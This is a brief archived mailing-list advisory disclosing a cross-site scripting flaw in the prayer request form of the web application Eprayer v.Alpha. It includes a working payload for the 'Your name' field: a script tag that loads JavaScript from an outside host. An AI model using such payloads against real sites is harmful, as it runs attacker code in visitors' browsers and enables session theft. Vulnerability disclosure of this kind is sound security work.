ePrayver v.Alpha - XSS

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Eprayer v.Alpha.

Homepage:
http://eprayer.sourceforge.net

Affected files:

input boxs of prayer request.

User submitted data is not sanatized before being dynamically generated. Try putting the code below in as "Your name"

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:

http://www.youfucktard.com/xsp/eprayer1.jpg
http://www.youfucktard.com/xsp/eprayer2.jpg
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux